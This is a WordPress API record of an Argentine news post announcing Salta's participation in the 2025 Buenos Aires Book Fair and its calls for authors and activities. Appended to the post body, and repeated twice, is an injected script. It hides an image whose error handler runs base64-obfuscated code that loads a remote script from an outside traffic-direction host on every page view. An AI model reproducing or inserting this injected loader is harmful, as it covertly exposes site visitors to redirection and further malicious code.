{"id":5024,"date":"2025-04-07T10:13:13","date_gmt":"2025-04-07T13:13:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5024"},"modified":"2025-08-13T23:37:09","modified_gmt":"2025-08-14T02:37:09","slug":"salta-estara-presente-en-la-feria-internacional-del-libro-en-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5024","title":{"rendered":"Salta estar\u00e1 presente en la Feria Internacional del Libro en Buenos Aires"},"content":{"rendered":"\n<p><strong><em>La Provincia ser\u00e1 parte de la 49\u00aa edici\u00f3n de la Feria Internacional del Libro de Buenos Aires, que se llevar\u00e1 a cabo del 24 de abril al 12 de mayo de 2025 en La Rural.<\/em><\/strong><\/p>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura<\/strong>&nbsp;de la Provincia de Salta invita a escritores\/as, editoriales y artistas salte\u00f1os en general a participar de la 49\u00aa edici\u00f3n de la Feria Internacional del Libro de Buenos Aires, que se desarrollar\u00e1 del 24 de abril al 12 de mayo de 2025 en el predio de La Rural.<\/p>\n\n\n\n<p>La Feria de la Ciudad de Buenos Aires se realiz\u00f3 por primera vez en 1975 y a trav\u00e9s de los a\u00f1os se consolid\u00f3 como uno de los eventos culturales m\u00e1s importantes del mundo. Salta formar\u00e1 parte del stand Norte Cultura, junto a las provincias de Tucum\u00e1n, Jujuy y Catamarca, con el objetivo de fortalecer la articulaci\u00f3n regional, optimizar recursos y contribuir a una construcci\u00f3n federal de la cultura.<\/p>\n\n\n\n<p>Para participar del stand, la Secretar\u00eda de Cultura pone a disposici\u00f3n dos convocatorias, la primera destinada a autores\/as y editoriales que deseen enviar ejemplares de sus libros para ser exhibidos y comercializados en el espacio de la provincia.<\/p>\n\n\n\n<p>La segunda convocatoria es para todos aquellos\/as interesados\/as en organizar actividades en el stand Norte Cultura. Podr\u00e1n postular propuestas que se vinculen desde las diversas disciplinas al universo del libro como presentaciones de novedades editoriales, charlas, conferencias, actividades l\u00fadicas, lecturas en vivo, entre otras.<\/p>\n\n\n\n<p>Ambas convocatorias estar\u00e1n abiertas desde el 27 de marzo al 11 de abril inclusive y los\/as interesados deber\u00e1n leer los reglamentos y completar los formularios online correspondientes.<\/p>\n\n\n\n<p>Los formularios para cada inscripci\u00f3n se encuentran disponibles en&nbsp;<a href=\"http:\/\/culturasalta.gob.ar\/\">culturasalta.gob.ar<\/a>.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Provincia ser\u00e1 parte de la 49\u00aa edici\u00f3n de la Feria Internacional del Libro de Buenos Aires, que se llevar\u00e1 a cabo del 24 de abril al 12 de mayo de 2025 en La Rural. La&nbsp;Secretar\u00eda de Cultura&nbsp;de la Provincia de Salta invita a escritores\/as, editoriales y artistas salte\u00f1os en general a participar de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5025,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-5024","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5024"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024\/revisions"}],"predecessor-version":[{"id":6530,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024\/revisions\/6530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5025"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5024"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5024"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}